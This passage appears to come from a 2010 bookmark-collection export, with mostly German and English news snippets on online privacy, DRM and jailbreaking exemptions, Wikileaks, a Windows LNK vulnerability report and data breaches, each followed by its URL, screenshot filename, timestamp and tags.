notifications, plays sound effects and keeps running stats about the % of websites you’ve visit with Google bugs present. +</p>http://fffff.at/google-alarm/page_shots/2010/07/28/googlealarm.pnggooglealarm131012010-07-28 14:26:206google online privacy"Indexing and retrieval of blogs" patented by GoogleAccording to this new "Indexing and retrieval of blogs" entry in the U.S. Patents database, Google has just today received protection for searching blogs.<p>According to this new "Indexing and retrieval of blogs" entry in the U.S. Patents database, Google has just today received protection for searching blogs. +</p>http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=%2Fnetahtml%2FPTO%2Fsrchnum.htm&r=1&f=G&l=50&s1=7,765,209.PN.&OS=PN/7,765,209&RS=PN/7,765,209page_shots/2010/07/28/indexingandretrievalofblogspatentedbygoog.pngindexingandretrievalofblogspatentedbygoog131012010-07-28 14:25:006google patent search softwareheise online - Massenerkrankung in Foxconn-Werknachdem rund 250 Mitarbeiter am vergangenen Freitag während der Arbeit plötzlich über Schwindelgefühle und Übelkeit klagten und ärztlich behandelt werden mussten. ... Das Foxconn-Management äußert aber die Vermutung, "routinemäßig auf dem Werksgelände versprühte Pestizide" könnten der Grund dafür sein.<p>nachdem rund 250 Mitarbeiter am vergangenen Freitag während der Arbeit plötzlich über Schwindelgefühle und Übelkeit klagten und ärztlich behandelt werden mussten. ... Das Foxconn-Management äußert aber die Vermutung, "routinemäßig auf dem Werksgelände versprühte Pestizide" könnten der Grund dafür sein. +</p>http://www.heise.de/newsticker/meldung/Massenerkrankung-in-Foxconn-Werk-1046583.htmlpage_shots/2010/07/28/heiseonline-massenerkrankunginfoxconn-werk.pngheiseonline-massenerkrankunginfoxconn-werk11012010-07-28 14:15:526apple foxconn labourvowe dot net :: Lug und Trug von 1&11 und 1 schickt Werbung mit Absender aus den Kontakten.<p>1 und 1 schickt Werbung mit Absender aus den Kontakten. +</p>http://vowe.net/archives/011607.htmlpage_shots/2010/07/28/vowedotnetlugundtrugvon11.pngvowedotnetlugundtrugvon1111012010-07-28 09:46:5761und1 fraudPork-Filled Counter-Islamic Bomb DeviceReading the partial patent application on their minimal website, it appears to be a packet of pork product, combined with a big sign saying something like: "Warning. If you blow up a bomb right here, you'll get pork stuff all over you before you die -- which might be suboptimal from a religious point of view."<p>Reading the partial patent application on their minimal website, it appears to be a packet of pork product, combined with a big sign saying something like: "Warning. If you blow up a bomb right here, you'll get pork stuff all over you before you die -- which might be suboptimal from a religious point of view." +</p>http://www.schneier.com/blog/archives/2010/07/pork-filled_cou.htmlpage_shots/2010/07/28/pork-filledcounter-islamicbombdevice_.pngpork-filledcounter-islamicbombdevice151012010-07-28 02:01:096:mTerrorismusexperte warnt vor C++Schön blöd: Im französischen Sender France5 hat der “Terrorismusexperte” Roland Jacquard von der Organisation “Observatoire international du terrorisme” vor Al-Quaida – Handbüchern im Netz gewarnt. Dabei war er so kundig von der Materie, dass er ein C++ – Programmierbuch in arabischer Sprache den Zuschauern präsentierte<p>Schön blöd: Im französischen Sender France5 hat der “Terrorismusexperte” Roland Jacquard von der Organisation “Observatoire international du terrorisme” vor Al-Quaida – Handbüchern im Netz gewarnt. Dabei war er so kundig von der Materie, dass er ein C++ – Programmierbuch in arabischer Sprache den Zuschauern präsentierte +</p>http://www.netzpolitik.org/2010/terrorismusexperte-warnt-vor-c/page_shots/2010/07/27/terrorismusexpertewarntvorc.pngterrorismusexpertewarntvorc151012010-07-27 15:12:255c++ panikmache terrorUK ISP TalkTalk Monitoring its Customers Online Activity Without Consent &minus; ISPreview UKBroadband ISP TalkTalk UK could be about to incur the wrath of privacy campaigners after some of its customers spotted that their online website browsing activity was being monitored and recorded without consent. + +TalkTalk has since confirmed that the monitoring, which was first discovered on the ISPs discussion forum during the middle of July (here), is part of a future Malware/Security/Parental Guidance tool to be provided by Chinese vendor Huawei. This is due to launch before the end of 2010. <p>Broadband ISP TalkTalk UK could be about to incur the wrath of privacy campaigners after some of its customers spotted that their online website browsing activity was being monitored and recorded without consent. +</p> +<p>TalkTalk has since confirmed that the monitoring, which was first discovered on the ISPs discussion forum during the middle of July (here), is part of a future Malware/Security/Parental Guidance tool to be provided by Chinese vendor Huawei. This is due to launch before the end of 2010. +</p>http://www.ispreview.co.uk/story/2010/07/26/uk-isp-talktalk-monitoring-its-customers-online-activity-without-consent.htmlpage_shots/2010/07/27/ukisptalktalkmonitoringitscustomersonlineac.pngukisptalktalkmonitoringitscustomersonlineac11012010-07-27 15:10:375censorship isp spywareGeorgische Wirtschaftsministerin tanzt StripteaseFacebook-Foto sorgt für einen Skandal: Georgische Wirtschaftsministerin tanzt Striptease<p>Facebook-Foto sorgt für einen Skandal: Georgische Wirtschaftsministerin tanzt Striptease +</p>http://www.aktuell.ru/russland/panorama/georgische_wirtschaftsministerin_tanzt_striptease_3062.htmlpage_shots/2010/07/27/georgischewirtschaftsministerintanztstriptease.pnggeorgischewirtschaftsministerintanztstriptease151012010-07-27 15:00:405data facebook lossEFF wins enormous victory against DRM: legal to jailbreak iPhones, rip DVDs for mashup videosThe Electronic Frontier Foundation drove three deep wedges into the US prohibition on breaking DRM today. EFF had applied to the Copyright Office to grant exemptions permitting the cracking of DRM in three cases: first, to "jailbreak" a mobile device, such as an iPhone, where DRM is used to prevent phone owners from running software of their own choosing; second, to allow video remix artists to break the DRM on DVDs in order to take short excerpts for mashups posted to YouTube and other sharing sites; finally EFF got the Copyright Office to renew its ruling that made it legal to unlock cellphones so that they can be used with any carrier. + +These are major blows against the tradition in US law of protecting DRM, even when DRM wasn't upholding copyright. For example, Apple argued in its Copyright Office filing that it should be illegal under copyright law to install iPhone software unless Apple had approved and supplied it (akin to the principle that you should only be allowed company-approved bread in your toaster, or Folgers-approved milk in your instant coffee). <p>The Electronic Frontier Foundation drove three deep wedges into the US prohibition on breaking DRM today. EFF had applied to the Copyright Office to grant exemptions permitting the cracking of DRM in three cases: first, to "jailbreak" a mobile device, such as an iPhone, where DRM is used to prevent phone owners from running software of their own choosing; second, to allow video remix artists to break the DRM on DVDs in order to take short excerpts for mashups posted to YouTube and other sharing sites; finally EFF got the Copyright Office to renew its ruling that made it legal to unlock cellphones so that they can be used with any carrier. +</p> +<p>These are major blows against the tradition in US law of protecting DRM, even when DRM wasn't upholding copyright. For example, Apple argued in its Copyright Office filing that it should be illegal under copyright law to install iPhone software unless Apple had approved and supplied it (akin to the principle that you should only be allowed company-approved bread in your toaster, or Folgers-approved milk in your instant coffee). +</p>https://www.eff.org/press/archives/2010/07/26page_shots/2010/07/27/effwinsenormousvictoryagainstdrmlegaltoja.pngeffwinsenormousvictoryagainstdrmlegaltoja131012010-07-27 14:52:035apple, copyfight, digital, digital media, dmca, eff, freedom, imaginary property, legalEnthüllung brisanter Kriegsdokumente: Die Afghanistan-Protokolle - SPIEGEL ONLINE - Nachrichten - PolitikFor the records: Wikileaks veröffentlicht 92k z. T. geheimer Berichte des US-Militärs zum Afghanistaneinsatz 2006-2009<p>For the records: Wikileaks veröffentlicht 92k z. T. geheimer Berichte des US-Militärs zum Afghanistaneinsatz 2006-2009 +</p>http://www.spiegel.de/politik/ausland/0,1518,708311,00.htmlpage_shots/2010/07/27/enthullungbrisanterkriegsdokumentedieafghanis.pngenthullungbrisanterkriegsdokumentedieafghanis11012010-07-27 09:24:045military wikileaksheise online - Anwälte kritisisieren De-MailDer deutsche Anwaltsverein hat in einer Stellungnahme (PDF-Datei) die geplanten Regelungen des De-Mail-Dienstes kritisiert. Grundsätzlich sieht er gar keinen Bedarf für den Dienst. Wer rechtssichere Mail haben wolle, könne schon heute mit der vorhandenen Infrastruktur der elektronischen Signatur arbeiten.<p>Der deutsche Anwaltsverein hat in einer Stellungnahme (PDF-Datei) die geplanten Regelungen des De-Mail-Dienstes kritisiert. Grundsätzlich sieht er gar keinen Bedarf für den Dienst. Wer rechtssichere Mail haben wolle, könne schon heute mit der vorhandenen Infrastruktur der elektronischen Signatur arbeiten. +</p>http://www.heise.de/newsticker/meldung/Anwaelte-kritisisieren-De-Mail-1045652.htmlpage_shots/2010/07/27/heiseonline-anwaltekritisisierende-mail.pngheiseonline-anwaltekritisisierende-mail11012010-07-27 09:22:185de-mailSkullSecurity &raquo; Blog Archive &raquo; Return of the Facebook SnatchersWell last week @FSLabsAdvisor wrote an interesting Tweet: it turns out, by heading to https://www.facebook.com/directory, you can get a list of every searchable user on all of Facebook! Torrent provided!<p>Well last week @FSLabsAdvisor wrote an interesting Tweet: it turns out, by heading to https://www.facebook.com/directory, you can get a list of every searchable user on all of Facebook! Torrent provided! +</p>http://www.skullsecurity.org/blog/?p=887page_shots/2010/07/27/skullsecurityraquoblogarchiveraquoretu.pngskullsecurityraquoblogarchiveraquoretu11012010-07-27 09:15:485facebookAppleInsider | US government legalizes iPhone 'jailbreaking,' unlockingThe U.S. government on Monday announced new rules that make it officially legal for iPhone owners to "jailbreak" their device and run unauthorized third-party applications. In addition, it is now acceptable to unlock any cell phone for use on multiple carriers. + +According to The Associated Press, the government approved a handful of new exemptions to a federal law that prevents the circumvention of technical measure that prevent users from accessing and modifying copyrighted works. The report noted that every three years, the Library of Congress' Copyright Office authorizes exemptions to ensure existing law does not prevent non-infringing use of copyrighted material. + +In addition, another exemption was approved that would allow all cell phone users to unlock their device for use on an unapproved carrier. Currently, Apple's iPhone is available exclusively through AT&T, but unlocking it can allow for voice calls and EDGE data speeds on rival carrier T-Mobile. + +Other exemptions announced Monday allow people to break protections on video games to investigate or correct security flaws; allow college professors, film students and documentary filmmakers to break copy protection measures on DVDs to embed clips for educational purposes, criticism, commentary and noncommercial videos; and allow computer owners to bypass the need for external security devices (dongles) if the hardware no longer works and cannot be replaced.<p>The U.S. government on Monday announced new rules that make it officially legal for iPhone owners to "jailbreak" their device and run unauthorized third-party applications. In addition, it is now acceptable to unlock any cell phone for use on multiple carriers. +</p> +<p>According to The Associated Press, the government approved a handful of new exemptions to a federal law that prevents the circumvention of technical measure that prevent users from accessing and modifying copyrighted works. The report noted that every three years, the Library of Congress' Copyright Office authorizes exemptions to ensure existing law does not prevent non-infringing use of copyrighted material. +</p> +<p>In addition, another exemption was approved that would allow all cell phone users to unlock their device for use on an unapproved carrier. Currently, Apple's iPhone is available exclusively through AT&amp;T, but unlocking it can allow for voice calls and EDGE data speeds on rival carrier T-Mobile. +</p> +<p>Other exemptions announced Monday allow people to break protections on video games to investigate or correct security flaws; allow college professors, film students and documentary filmmakers to break copy protection measures on DVDs to embed clips for educational purposes, criticism, commentary and noncommercial videos; and allow computer owners to bypass the need for external security devices (dongles) if the hardware no longer works and cannot be replaced. +</p>http://www.appleinsider.com/articles/10/07/26/us_government_legalizes_iphone_jailbreaking_for_unauthorized_apps.htmlpage_shots/2010/07/26/appleinsiderusgovernmentlegalizesiphonejai.pngappleinsiderusgovernmentlegalizesiphonejai11012010-07-26 22:44:415apple copyfight jailbreak Hackers shut down EU carbon-trading website | Environment | guardian.co.uk Hackers hijacked Europe's carbon-trading website and replaced it with spoof page detailing flaws in cap and trade scheme<p>Hackers hijacked Europe's carbon-trading website and replaced it with spoof page detailing flaws in cap and trade scheme +</p>http://www.guardian.co.uk/environment/2010/jul/26/eu-carbon-trading-website-hackedpage_shots/2010/07/26/hackersshutdowneucarbon-tradingwebsiteenv.pnghackersshutdowneucarbon-tradingwebsiteenv11012010-07-26 22:42:035defacement ecology +Bremer Proteste gegen Datensammlung | WESER-KURIERpassend zum Thema<p>passend zum Thema +</p>http://www.weser-kurier.de/Artikel/Bremen/Vermischtes/203991/Bremer+Proteste+gegen+Datensammlung.htmlpage_shots/2010/07/26/bremerprotestegegendatensammlungweser-kuri.pngbremerprotestegegendatensammlungweser-kuri11012010-07-26 22:40:025zensusNord-Datenschutz-Chef: Volkszählung überflüssig - Nachrichten Newsticker - dpa_nt - regioline_nt - hamburgschleswigholstein_nt - WELT ONLINESchleswig-Holsteins Datenschutz-Chef Thilo Weichert hält die 2011 geplante Volkszählung für überflüssig. «Für politische Planungen sind genaue Zahlen wichtig, doch die haben wir auch ohne eine umfassende Volkszählung», sagte er den «Lübecker Nachrichten»<p>Schleswig-Holsteins Datenschutz-Chef Thilo Weichert hält die 2011 geplante Volkszählung für überflüssig. «Für politische Planungen sind genaue Zahlen wichtig, doch die haben wir auch ohne eine umfassende Volkszählung», sagte er den «Lübecker Nachrichten» +</p>http://www.welt.de/newsticker/dpa_nt/regioline_nt/hamburgschleswigholstein_nt/article8630362/Volkszaehlung-ueberfluessig.htmlpage_shots/2010/07/25/nord-datenschutz-chefvolkszahlunguberflussig.pngnord-datenschutz-chefvolkszahlunguberflussig11012010-07-25 22:58:585zensusAGBs der DE-Mail- dürfen keine rechts- oder sittenwidrigen Inhalte im System eingestellt werden und es darf nicht auf solche Inhalte hingewiesen werden. Dazu zählen vor allem Inhalte, die im Sinne der §§ 130, 130 a und 131 StGB der Volksverhetzung dienen, zu Straftaten anleiten oder Gewalt verherrlichen oder verharmlosen, sexuell anstößig sind, im Sinne der §§ 184 ff. StGB pornografisch sind, geeignet sind, Kinder oder Jugendliche sittlich schwer zu gefährden oder in ihrem Wohl zu beeinträchtigen *oder das Ansehen der DPAG schädigen können*.<ul> + <li> + dürfen keine rechts- oder sittenwidrigen Inhalte im System eingestellt werden und es darf nicht auf solche Inhalte hingewiesen werden. Dazu zählen vor allem Inhalte, die im Sinne der §§ 130, 130 a und 131 StGB der Volksverhetzung dienen, zu Straftaten anleiten oder Gewalt verherrlichen oder verharmlosen, sexuell anstößig sind, im Sinne der §§ 184 ff. StGB pornografisch sind, geeignet sind, Kinder oder Jugendliche sittlich schwer zu gefährden oder in ihrem Wohl zu beeinträchtigen <em>oder das Ansehen der DPAG schädigen können</em>. + </li> +</ul>https://www.epost.de/adressreservierung/footer/rechtliches/agb.htmlpage_shots/2010/07/25/agbsderde-mail.pngagbsderde-mail11012010-07-25 22:52:365agb de-mailYes Men documentary goes online via Bittorrent to evade censorshipPrankster activists The Yes Men are sick of having the videos depicting their shenanigans taken down through copyright complaints, so they've put the latest video, a full-length doc called The Yes Men Fix the World up as a torrent file through VODO, resistant to censorship and easy to get. <p>Prankster activists The Yes Men are sick of having the videos depicting their shenanigans taken down through copyright complaints, so they've put the latest video, a full-length doc called The Yes Men Fix the World up as a torrent file through VODO, resistant to censorship and easy to get. +</p>http://vodo.net/yesmenpage_shots/2010/07/25/yesmendocumentarygoesonlineviabittorrentto.pngyesmendocumentarygoesonlineviabittorrentto131012010-07-25 17:01:165bittorrent, censorship, copyfight, digital media + Amiga: 25 Years Later Amiga turns 25. <p>Amiga turns 25. +</p>http://technologizer.com/2010/07/23/amiga/page_shots/2010/07/25/amiga25yearslater.pngamiga25yearslater11012010-07-25 12:34:365amiga commodore42 finale Thesen zum Internet | 137b zeitweise42 finale Thesen zum Internet +Publiziert am 20. Juli 2010 von zeitweise +Das Netz ist groß. +Das Netz ist größer als du dir vorstellen kannst. +Es ist größer als der Ölteppich im Golf von Mexiko. +Wenn du es von Japanern auf Reiskörner transkribieren ließest, dann bräuchtest du so viele Reiskörner, dass Kim Yong-il zum Mittagessen seine Atomwaffen verspeisen müsste. +Und würdest du davon ein You-Tube-Video drehen, also von Kim Yong-il wie er seine Atomwaffen verspeist, dann wäre das Netz so groß, dass sich mehr als 100 Millionen Menschen dieses Video ansähen. +Und ein anderer würde kommen und dein Video rippen und ein süßes Kätzchen hineinschneiden. +Und die Leute würden es lieben. +Leute, die du in deinem Leben nicht kennenlernen wirst. +Leute, die du in deinem Leben nicht kennenlernen willst. +Deinen Nachbarn zum Beispiel. +Aber das musst du auch nicht. Das Netz lässt dir die freie Wahl. +Du bist der Held in diesem Abenteuer. Du entscheidest, welche Links du klickst, ob du dich bei Parship oder Ebay anmeldest, ob du bingst oder googlest, ob du bei Facebook deine Daten verschenkst oder bei Twitter deine Gedanken. +Es gibt Menschen, denen macht das Angst. Deshalb hassen sie das Netz. Sie wollen Leitplanken, feste Regeln und gottgegebene Werte. Sie wollen gesagt bekommen, was sie zu tun haben, damit sie sich nicht den Kopf darüber zerbrechen müssen, was sie tun wollen. +Das Netz sagt es dir nicht. +Das Netz sagt: „I can haz cheeseburger.“ +Aber du kannst keinen Cheeseburger haben im Netz. Und selbst wenn dir Amazon einen Cheeseburger schickt, dann gibt es dahinter einen Menschen, der die Patties entfrostet, das Fleisch brät und es in Ketchup ertränkt. Einen Menschen, der in dieser Zeit für dich darauf verzichtet, nachzusehen, welcher Shitstorm gerade auf Twitter heraufzieht. +Und deshalb ist Dankbarkeit angebracht. Dankbarkeit dafür, dass es Menschen gibt, die uns den Rücken freihalten, während wir unser Netz gestalten. +Und wie das so sein müsste in einer idealen Gesellschaft, geben wir ihnen etwas zurück. Denn auch der Patty-Mann freut sich, wenn er nach einem langen Arbeitstag noch ein bisschen Nerdcore klicken kann. +Wir stricken unsere Gedanken zu Häkelschweinen und literal Videos und zeigen sie der Welt. +Wir borgen uns die beste schwarze Knete und die beste weiße und formen aus zwei Klassikern ein neues Werk. Eines das zeigt, dass es mehr gibt als Schwarz und Weiß. Tausend schillernde Grauschattierungen. +Wir recherchieren Informationen, prüfen, entwickeln weiter. Wir sammeln und bewerten sie und verstecken sie in Wikis. +Und wenn wir sie selbst vergessen: Das Netz vergisst sie nicht. +Selbstlos steht es bereit, um Generationen zukünftiger Archäologen in Brot und Arbeit zu bringen. +Denn im Netz gestalten wir die Zukunft. +Und in Wikipedia die Vergangenheit. +Und auf Twitter die Gegenwart. +Das Netz ist unser Gedächtnis. Ein Gütiges, Neutrales. Es speichert gleichberechtigt die 0:8 Niederlage der Maltesischen Fußballnationalmannschaft 76 wie die 11 Dimensionen der Stringtheorie. +Es gibt dem grün geschnäbelten Twitterer eine Stimme, der sein erstes „Hallo Welt!“ in die Weite ruft wie dem Sascha Lobo, der sich einen süffisanten Netzpolitikwitz über die SPD verkneift. +Es fördert die Kooperation und die Kommunikation. +Es lässt Menschen über den Globus hinweg an Software schreiben, die sich im gleichen Land gegenseitig die Arbeitsplätze wegnehmen würden. +Es bietet Vollbeschäftigung, denn in seiner Endlosigkeit gibt es stets genug zu tun. +Für die Produzenten und die Konsumenten und die Prosumenten. Denn was die Wirklichkeit da draußen nicht versteht: Der eine ist ohne den anderen nichts. Eine Formspring-Seite ohne Fragen, ein ungeflattrtes Flattr-Thing, ein Facepalm ohne Hand und Gesicht. +Die Aufmerksamkeit ist die Währung des Internets. Doch der, der viel davon bekommt, kann doch nicht mehr ausgeben als jeder andere. Der Reichtum entkoppelt vom Prassen. Ein Kapitalistenalbtraum. +Und deshalb muss alles zurücktransferiert werden in die echte Welt, versilbert, vergoldet, monetarisiert. Weil man sonst ja hungert und Hungern auf den ersten Blick zwar eine schlanke Figur, aber auf Dauer recht unglücklich macht. +Und so liegt die Realität in ständigem Clinch mit dem Netz. Wie Schäuble und die Bürgerrechte. +Und Missionare ziehen in die neue Welt mit Fackeln und Kanonen, um sie zu zivilisieren. Die Datenautobahn soll ein Parkplatz werden mit Feuerwehreinfahrtszone und Parkscheinautomat. +Doch das Netz zu bekämpfen ist so schwer wie ein Loch im Ozean zu stopfen. Denn es spiegelt die menschliche Natur. +Es lässt sich nicht fassen. +Denn wir sind das Netz. +Große, Kleine, Dicke, Dünne, Dumme, Deppen und Idioten. Wortverdreher, Wortversteher. Frauen, Männer, Transvestiten. Zwitter, Nerds und Aleviten. Zum Leidwesen aller auch reimende Blogger. Menschen könnte man sie nennen. Oder Kriminelle. +Das ist eine Sache der Perspektive. Verhandelbar und verhandelt wird es. Im sich selbst ähnlichen Meta-Medium Internet. Das tausend Fragen aufwirft. +Und eine Antwort auf alle Fragen.<p>42 finale Thesen zum Internet + Publiziert am 20. Juli 2010 von zeitweise + Das Netz ist groß. + Das Netz ist größer als du dir vorstellen kannst. + Es ist größer als der Ölteppich im Golf von Mexiko. + Wenn du es von Japanern auf Reiskörner transkribieren ließest, dann bräuchtest du so viele Reiskörner, dass Kim Yong-il zum Mittagessen seine Atomwaffen verspeisen müsste. + Und würdest du davon ein You-Tube-Video drehen, also von Kim Yong-il wie er seine Atomwaffen verspeist, dann wäre das Netz so groß, dass sich mehr als 100 Millionen Menschen dieses Video ansähen. + Und ein anderer würde kommen und dein Video rippen und ein süßes Kätzchen hineinschneiden. + Und die Leute würden es lieben. + Leute, die du in deinem Leben nicht kennenlernen wirst. + Leute, die du in deinem Leben nicht kennenlernen willst. + Deinen Nachbarn zum Beispiel. + Aber das musst du auch nicht. Das Netz lässt dir die freie Wahl. + Du bist der Held in diesem Abenteuer. Du entscheidest, welche Links du klickst, ob du dich bei Parship oder Ebay anmeldest, ob du bingst oder googlest, ob du bei Facebook deine Daten verschenkst oder bei Twitter deine Gedanken. + Es gibt Menschen, denen macht das Angst. Deshalb hassen sie das Netz. Sie wollen Leitplanken, feste Regeln und gottgegebene Werte. Sie wollen gesagt bekommen, was sie zu tun haben, damit sie sich nicht den Kopf darüber zerbrechen müssen, was sie tun wollen. + Das Netz sagt es dir nicht. + Das Netz sagt: „I can haz cheeseburger.“ + Aber du kannst keinen Cheeseburger haben im Netz. Und selbst wenn dir Amazon einen Cheeseburger schickt, dann gibt es dahinter einen Menschen, der die Patties entfrostet, das Fleisch brät und es in Ketchup ertränkt. Einen Menschen, der in dieser Zeit für dich darauf verzichtet, nachzusehen, welcher Shitstorm gerade auf Twitter heraufzieht. + Und deshalb ist Dankbarkeit angebracht. Dankbarkeit dafür, dass es Menschen gibt, die uns den Rücken freihalten, während wir unser Netz gestalten. + Und wie das so sein müsste in einer idealen Gesellschaft, geben wir ihnen etwas zurück. Denn auch der Patty-Mann freut sich, wenn er nach einem langen Arbeitstag noch ein bisschen Nerdcore klicken kann. + Wir stricken unsere Gedanken zu Häkelschweinen und literal Videos und zeigen sie der Welt. + Wir borgen uns die beste schwarze Knete und die beste weiße und formen aus zwei Klassikern ein neues Werk. Eines das zeigt, dass es mehr gibt als Schwarz und Weiß. Tausend schillernde Grauschattierungen. + Wir recherchieren Informationen, prüfen, entwickeln weiter. Wir sammeln und bewerten sie und verstecken sie in Wikis. + Und wenn wir sie selbst vergessen: Das Netz vergisst sie nicht. + Selbstlos steht es bereit, um Generationen zukünftiger Archäologen in Brot und Arbeit zu bringen. + Denn im Netz gestalten wir die Zukunft. + Und in Wikipedia die Vergangenheit. + Und auf Twitter die Gegenwart. + Das Netz ist unser Gedächtnis. Ein Gütiges, Neutrales. Es speichert gleichberechtigt die 0:8 Niederlage der Maltesischen Fußballnationalmannschaft 76 wie die 11 Dimensionen der Stringtheorie. + Es gibt dem grün geschnäbelten Twitterer eine Stimme, der sein erstes „Hallo Welt!“ in die Weite ruft wie dem Sascha Lobo, der sich einen süffisanten Netzpolitikwitz über die SPD verkneift. + Es fördert die Kooperation und die Kommunikation. + Es lässt Menschen über den Globus hinweg an Software schreiben, die sich im gleichen Land gegenseitig die Arbeitsplätze wegnehmen würden. + Es bietet Vollbeschäftigung, denn in seiner Endlosigkeit gibt es stets genug zu tun. + Für die Produzenten und die Konsumenten und die Prosumenten. Denn was die Wirklichkeit da draußen nicht versteht: Der eine ist ohne den anderen nichts. Eine Formspring-Seite ohne Fragen, ein ungeflattrtes Flattr-Thing, ein Facepalm ohne Hand und Gesicht. + Die Aufmerksamkeit ist die Währung des Internets. Doch der, der viel davon bekommt, kann doch nicht mehr ausgeben als jeder andere. Der Reichtum entkoppelt vom Prassen. Ein Kapitalistenalbtraum. + Und deshalb muss alles zurücktransferiert werden in die echte Welt, versilbert, vergoldet, monetarisiert. Weil man sonst ja hungert und Hungern auf den ersten Blick zwar eine schlanke Figur, aber auf Dauer recht unglücklich macht. + Und so liegt die Realität in ständigem Clinch mit dem Netz. Wie Schäuble und die Bürgerrechte. + Und Missionare ziehen in die neue Welt mit Fackeln und Kanonen, um sie zu zivilisieren. Die Datenautobahn soll ein Parkplatz werden mit Feuerwehreinfahrtszone und Parkscheinautomat. + Doch das Netz zu bekämpfen ist so schwer wie ein Loch im Ozean zu stopfen. Denn es spiegelt die menschliche Natur. + Es lässt sich nicht fassen. + Denn wir sind das Netz. + Große, Kleine, Dicke, Dünne, Dumme, Deppen und Idioten. Wortverdreher, Wortversteher. Frauen, Männer, Transvestiten. Zwitter, Nerds und Aleviten. Zum Leidwesen aller auch reimende Blogger. Menschen könnte man sie nennen. Oder Kriminelle. + Das ist eine Sache der Perspektive. Verhandelbar und verhandelt wird es. Im sich selbst ähnlichen Meta-Medium Internet. Das tausend Fragen aufwirft. + Und eine Antwort auf alle Fragen. +</p>http://www.137b.org/?p=660page_shots/2010/07/25/42finalethesenzuminternet137bzeitweise.png42finalethesenzuminternet137bzeitweise11012010-07-25 01:53:195internet thesenTurn an inkjet into a 3D printer - Boing BoingInk Jet printer converted into a 3d printer<p>Ink Jet printer converted into a 3d printer +</p>http://www.boingboing.net/2010/07/24/turn-an-inkjet-into.htmlpage_shots/2010/07/25/turnaninkjetintoa3dprinter-boingboing.pngturnaninkjetintoa3dprinter-boingboing11012010-07-25 01:44:4653d printPentagon workers tied to child porn - The Boston GlobeWer ist Child P0rn Kunde? "several dozen Pentagon officials and contractors with high-level security clearances" as found by the FBI<p>Wer ist Child P0rn Kunde? "several dozen Pentagon officials and contractors with high-level security clearances" as found by the FBI +</p>http://www.boston.com/news/nation/washington/articles/2010/07/23/pentagon_workers_tied_to_child_porn/page_shots/2010/07/25/pentagonworkerstiedtochildporn-thebostong.pngpentagonworkerstiedtochildporn-thebostong11012010-07-25 00:48:245child porn, fbiSpam Filtering? Patented! 36 Companies Sued | Techdirt 36 companies have been sued for patent infringement in Marshall, Texas (of course) for supposedly violating a patent (6,018,761) on spam filtering. The companies sued represent a who's who of corporate America, including Apple, Google, HP, RIM, Citigroup, Capital One, Alcatel Lucent, AIG, AOL, JP Morgan Chase, McAfee, Symantec, Yahoo, IBM and many others. + +The patent itself is rather simple. Not much more than a database lookup. In full: + +What is claimed is: +A method of obtaining context information about a sender of an electronic message using a mail processing comprising the steps of: + +scanning the message, usinig the mail processine program to determine if the message contains a reference in a header portion of the message to at least one feature of the sender's context, wherein the sender's context is information about the sender or the message that is usefiul to the recipient in understanding more about the context in which the sender sent the message; +if the message contains such reference, using the mail processing program and such reference to obtain [sender] the context information from a location external to the message; +if the message does not contain such reference, using the mail processing program and information present in the message to indirectly obtain the [sender] context information using external reference sources to find a reference to the [sender] context information. + +The method of claim 1, wherein the reference to at least one feature is a reference to a location where context information is stored. + +The method of claim 1, wherein the reference to at least one feature is a hint usable to retrieve a location where context information is stored.<p> 36 companies have been sued for patent infringement in Marshall, Texas (of course) for supposedly violating a patent (6,018,761) on spam filtering. The companies sued represent a who's who of corporate America, including Apple, Google, HP, RIM, Citigroup, Capital One, Alcatel Lucent, AIG, AOL, JP Morgan Chase, McAfee, Symantec, Yahoo, IBM and many others. +</p> +<p>The patent itself is rather simple. Not much more than a database lookup. In full: +</p> +<p>What is claimed is: + A method of obtaining context information about a sender of an electronic message using a mail processing comprising the steps of: +</p> +<p>scanning the message, usinig the mail processine program to determine if the message contains a reference in a header portion of the message to at least one feature of the sender's context, wherein the sender's context is information about the sender or the message that is usefiul to the recipient in understanding more about the context in which the sender sent the message; + if the message contains such reference, using the mail processing program and such reference to obtain [sender] the context information from a location external to the message; + if the message does not contain such reference, using the mail processing program and information present in the message to indirectly obtain the [sender] context information using external reference sources to find a reference to the [sender] context information. +</p> +<p>The method of claim 1, wherein the reference to at least one feature is a reference to a location where context information is stored. +</p> +<p>The method of claim 1, wherein the reference to at least one feature is a hint usable to retrieve a location where context information is stored. +</p>http://www.techdirt.com/articles/20100722/02481510317.shtmlpage_shots/2010/07/25/spamfilteringpatented36companiessuedtech_.pngspamfilteringpatented36companiessuedtech11012010-07-25 00:40:375patent spamheise online - LNK-Lücke in Windows: Angriffswelle rollt anLNK-Hack: Von Industriespionage (inkl. 0-day) zum Massenwurm.<p>LNK-Hack: Von Industriespionage (inkl. 0-day) zum Massenwurm. +</p>http://www.heise.de/newsticker/meldung/LNK-Luecke-in-Windows-Angriffswelle-rollt-an-1044228.htmlpage_shots/2010/07/25/heiseonline-lnk-luckeinwindowsangriffswelle.pngheiseonline-lnk-luckeinwindowsangriffswelle11012010-07-25 00:33:365microsoft vulnerability windowsGegenentwurf zum Beschäftigtendatenschutz-Gesetzentwurf onlineDie Grünen haben einen Gegenentwurf zum stark [kritisierten](http://www.bfdi.bund.de/bfdi_forum/showthread.php?1311-Besch%C3%A4ftigtendatenschutz-Was-lange-w%C3%A4hrt-sollte-doch-eigentlich-gut-werden!) Beschäftigungsdatenschutz-Gesetzentwurf der Bundesregierung veröffentlicht. +Das besondere daran: Der Gegenentwurf wurde in einem dafür erstellten Blog online gestellt und es wurde um Kommentare, Kritik und Anregungen der Bürger gebeten.<p>Die Grünen haben einen Gegenentwurf zum stark <a href="http://www.bfdi.bund.de/bfdi_forum/showthread.php?1311-Besch%C3%A4ftigtendatenschutz-Was-lange-w%C3%A4hrt-sollte-doch-eigentlich-gut-werden!">kritisierten</a> Beschäftigungsdatenschutz-Gesetzentwurf der Bundesregierung veröffentlicht. + Das besondere daran: Der Gegenentwurf wurde in einem dafür erstellten Blog online gestellt und es wurde um Kommentare, Kritik und Anregungen der Bürger gebeten. +</p>http://beschaeftigten-datenschutz.de/page_shots/2010/07/25/gegenentwurf-zum-beschaftigtendatenschutz-gesetzen.pnggegenentwurf-zum-beschaftigtendatenschutz-gesetzen11012010-07-25 00:02:025datenschutzHospital: files with personal, medical data on 800,000 gone - SC Magazine USKrankenhaus schickt Backupbänder zum schreddern. Dort kommen sie nicht an. 800.000 Datensätze enthalten Social Security numbers, addresses, phone numbers, birth dates, health plan information, in addition to diagnoses and treatments, according to the 318-bed hospital. There also was some credit card and bank account information stored on the files.<p>Krankenhaus 